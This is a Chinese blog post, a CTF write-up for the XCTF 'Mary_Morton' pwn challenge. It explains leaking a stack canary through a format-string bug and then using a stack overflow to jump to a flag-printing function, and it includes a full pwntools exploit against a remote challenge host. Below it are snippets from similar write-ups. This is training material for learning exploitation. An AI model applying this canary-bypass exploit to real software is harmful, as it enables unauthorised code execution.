Mary_Morton(xctf)

最新推荐文章于 2022-03-03 18:47:01 发布
最新推荐文章于 2022-03-03 18:47:01 发布
阅读量374 收藏
点赞数
分类专栏: # xctf(pwn高手区) CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43868725/article/details/106709330
版权
程序保护和流程保护:流程:main()如果输入1会进入这个函数有一个栈溢出漏洞。如果输入2会进入这个函数有一个格式化字符串漏洞。还有一个cat_flag的函数0x1 利用过程首先这个程序开启了canary,所以直接栈溢出会报错。但是我们知道v2变量中存放的是canary值(v2在函数开始时就被**__readfsqword(0x28u)赋值,函数结束前与__readfsqword(0x28u)**进行比较),如果我们能通过格式化字符串漏洞将v2的值泄露出来就可以利用栈溢出漏洞
摘要由CSDN通过智能技术生成

0x0 程序保护和流程

保护:

在这里插入图片描述

流程:

main()

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bq3HEwXC-1591926684688)(C:\Users\PC\Desktop\学习任务\CTF\xctf\高手\Mary_Morton\picture\main.png)]
在这里插入图片描述
如果输入1会进入

在这里插入图片描述

这个函数有一个栈溢出漏洞。

如果输入2会进入

在这里插入图片描述

这个函数有一个格式化字符串漏洞。

还有一个cat_flag的函数

在这里插入图片描述

0x1 利用过程

首先这个程序开启了canary,所以直接栈溢出会报错。但是我们知道v2变量中存放的是canary值(v2在函数开始时就被**__readfsqword(0x28u)赋值,函数结束前与__readfsqword(0x28u)**进行比较),如果我们能通过格式化字符串漏洞将v2的值泄露出来就可以利用栈溢出漏洞。首先先确定偏移量。

在这里插入图片描述

偏移量为6的位置是格式化字符串漏洞这个函数的栈的开始位置,而开始位置距离与v2的距离为0x88。所以当格式化字符串构造成**%(6+0x88/8)p**的时候就会将v2这个地址中的值已十六进制的形式输出出来。之后就可以绕过canary获得flag了。

0x02 exp

from pwn import *
sh=remote('220.249.52.133','45164')
#sh=process('./a')
cat_flag=0x4008DA
offset=6
sh.recvuntil('3. Exit the battle \n')
sh.sendline('2')
payload='%{}$p'.format(offset+0x88/8)
sh.sendline(payload)
sh.recvuntil("0x")
canary_addr=int(sh.recv(16), 16)
sh.recvuntil('3. Exit the battle \n')
sh.sendline('1')
payload='a'*0x88+p64(canary_addr)+'a'*8+p64(cat_flag)
sh.sendline(payload)
sh.interactive()
whiteh4nd
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ASIS-CTF-Finals-2017 pwn Mary_Morton Writeup
qq_39596232的博客
09-03 596
题目描述: ASIS-CTF-Finals-2017 非常简单的热身pwn 分析思路: 1、首先查看文件的安全信息: tucker@ubuntu:~/xman/pwn$ file Mary_Morton Mary_Morton: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interp...
bailey_morton_cv:贝利·莫顿(Bailey Morton)的简历
04-01
bailey_morton_cv 贝利·莫顿(Bailey Morton)的简历
XCTF Mary_Morton
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-09 472
原题出现在ASIS-CTF-Finals-2017 程序存在两个漏洞,一个格式化字符串漏洞,一个栈溢出漏洞 通过格式化字符串漏洞泄露canary的值,然后再构造payload,利用栈溢出漏洞获取flag canary的值是v2,因此得到canary在栈中的位置为第17位(0x88 / 8=17),又因为程序为64位程序,64位程序函数调用前6个参数通过寄存器传递,所以要加6,因此格式化字符为%2...
mary_morton
pppp974的博客
07-22 1107
mary_morton 这道题开启了canary保护,大概说一下题目,就是让你选择漏洞一个格式化字符漏洞还有一个就是栈溢出,这道题思路就是通过格式化字符漏洞泄露出cannary的值,然后进行栈溢出,后门题目已经给了。 来算算偏移量吧,buf为rbp-90h,canary就是v2为rbp-8h,所以偏移量为88h,然后在算一算格式化字符与Buf的偏移量就可以算出要多少字节来进行泄露了。调了一下,输...
XCTF攻防世界高手mary_morton
weixin_45948183的博客
03-24 315
格式化字符串泄露canary,栈溢出 从函数执行就可以看出,一个格式化字符串啊漏洞,一个栈溢出漏洞 checksec了一下有canary的保护,开启了canary,就不能直接利用栈溢出覆盖返回地址,通过通过格式化字符串漏洞泄露canary的值,然后再进行栈溢出的覆盖 buf在rbp-90h,v2在rbp-8h,canary与我们输入参数的偏移为0x90 - 8 = 0x88所以,覆盖返回地址的话...
xctf高手进阶第二题 Mary_Morton
neuisf的博客
01-23 382
启动运行时输出提示有三个选项,分别是:1.缓冲区溢出漏洞;2.格式化字符串漏洞;3.退出。 解题方法:因为缓冲区溢出在main函数中,利用格式化字符串漏洞读取main函数的canary,利用缓冲区溢出运行0x4008DA处的system (/bin/cat flag)指令。 exp: from pwn import * p=remote('111.198.29.45'...
morton BLDC__and_PCB_Included.rar
08-01
标题"Morton BLDC__and_PCB_Included.rar"暗示了这个压缩包可能包含了关于Morton品牌无刷直流电动机(BLDC)以及与其相关的电路板(PCB)的设计、规格或使用信息。BLDC电机是一种现代电机技术,常用于需要高效率、...
lguest_launcher.rar_The Program
09-23
LGuest 是一种开源的用户空间虚拟化工具,由 Google 的 Andrew Morton 主导开发。它的设计目标是提供一种简单、快速的方法来创建和运行小型虚拟机,这些虚拟机可以在宿主机操作系统(如 Linux)上运行而不需依赖复杂...
morton.dms
08-06
64位下的格式化字符串的任意内存读取 格式化字符串 %n ,它的功能是将%n之前打印出来的字符个数,赋值给一个变量。
morton-java:莫顿PackUnpack库
05-12
Morton64 m = new Morton64 ( 2 , 32 ); // 2 dimenstions 32 bits eachlong code = m . pack( 13 , 42 ); // pack two valueslong [] values = m . unpack(code); // should get back 13 and 42
Mary_Morton [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列17
重新启程
12-24 1549
题目地址:Mary_Morton 已经是高手进阶区的第六题了,每个题目都有不少收获,持之以恒! 先看看题目内容 很好,这是一道非常简单的热身pwn,当然,我是不会相信的!哈哈 大家应该注意到了,难度系数第一次>1星了,步入2星的阶段,最高是10星!期待一下 惯例先来检查安全机制 root@mypwn:/ctf/work/python/mary_morton# checksec ...
攻防世界Mary_Morton
像初雪一样自由洒落
02-16 919
64位程序,开启了canary和nx保护 执行以下,效果如下: 有提示: 输入1那块存在栈溢出 输入2那块存在格式化字符串漏洞 拖到ida看一下 main函数: 栈溢出的函数: 有canary保护,根据程序可以看出,v2应该就是canary的值,一开始,将_readfsqword(0x28u)的值给v2,后来又和v2做异或操作,只有v2与它还相等,...
[XCTF-pwn] 1-Mary_Morton
weixin_52640415的博客
03-03 155
太简的没意思,可以怕忘了到哪了,索性把exp按顺序存上。 这个题是个格式化字符串的题,没开pie,程序里有system。 直接把printf改为system就行了 from pwn import * local = 0 if local == 1: p = process('./pwn') else: p = remote('111.200.241.244', 49641) elf = ELF('./pwn') context(arch='amd64', log_level='d
攻防世界pwn--Mary_Morton
YANG12345_6的博客
11-16 2205
攻防世界pwn–Mary_Morton file 一下,查看文件属性 checksec一下,查看保护措施 开了canary,在调用函数的时候会在栈上设置一个标志,标志的位置: EIP EBP canary logol ··· 栈的其他内容 开了NX,栈不可执行。 运行一下 ida查看其反汇编代码 在ida里看到有system函数: 地址:0x4008DA gdb调试,查看格式化字符串参数的位置 第六个位置 查看有关栈溢出的函数: 可以利用的栈溢出的buf的位置:rbp
XCTF-攻防世界CTF平台-PWN类——1、Mary_Morton(格式化字符串漏洞、缓冲区溢出漏洞)
Onlyone_1314的博客
09-09 1297
目录标题一级目录二级目录1、查看程序基本信息2、反编译程序3、攻击思路(1)先利用功能2格式化字符串漏洞(2)找到功能1的sub_400960()函数返回地址的位置方法二 一级目录 二级目录 1、查看程序基本信息 Mary_Morton程序,先用file查看: Linux下64位的ELF文件 再用checksec查看 程序开启了Partial RELRO、NX和Canary,没有PIE。程序开启了canary,就不能直接利用栈溢出覆盖返回地址了。因为在初始化一个栈帧时在栈底(stack overflow
攻防世界(pwn)--Mary_Morton 利用格式化字符串+栈溢出破解Canary的保护机制
半岛铁盒的博客
03-04 1018
ctf(pwn) canary保护机制讲解 与 破解方法介绍 程序执行流程 有三个选项,1是利用栈溢出,2是利用格式化字符串,3是退出;可连续输入多次; IDA分析 解题思路 程序存在canary保护,利用格式化字符串漏洞 得到canary的位置, 在利用栈溢出覆盖它,返回地址改为目标函数 4008da EXP from pwn import * r=remote('111.200.241.244',58448) r.sendlineafter("3. Exi
Mary_Morton
weixin_46711318的博客
08-19 179
之前有讲到canary的原理,这道题就用到了。 checksec ida 可以看到scanf是我们可以利用的格式化字符串漏洞,因此我们可以确认偏移了6个字节 而v2其实就是canary,通过观察buf所在的栈,发现偏移了0x88,那么就可以开始写代码了。 代码 from pwn import* s=remote('220.249.52.133',48752) sys=0x4008de s.recvuntil('battle') s.sendline('2') s.sendline('%23$p')
2019.10.10攻防世界 Mary_Morton
DSR446的博客
10-10 318
根据索引rbp提供的信息,我们知道,canary位置距离rbp为0x8,而我们的输入参数距离rbp为0x90。且这是一个64位程序。我们可以计算canary的偏移 = 6(6个寄存器)+(0x90-0x8)/8 = 23 :这里子所以减0x8是减的rbp。 【注】:这个程序缺少符号表且没有开PIE,所以我们在下断点的到时候通过在ida中找相应的地址,不用加上程序的加载地址。 最后的 ...
__readfsbyte、__readfsdword、__readfsqword、__readfsword
u013043103的博客
06-25 3238
Microsoft 专用 从偏移量的指定位置读取内存相对 FS 段开头。 语法 unsigned char __readfsbyte( unsigned long Offset ); unsigned short __readfsword( unsigned long Offset ); unsigned long __readfsdword( unsigned long Offset ); unsigned __int64 __readfsqword( unsi...
求矩阵四叉树的四进制和十进制Morton
最新发布
06-09
- 将Morton码的二进制表示转化为四进制数,得到节点的四进制Morton码,例如节点(3,2)的四进制Morton码为(32)。 2. 十进制Morton码 十进制Morton码将矩阵四叉树节点的坐标编码成十进制数,其中每一位表示节点在四叉...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值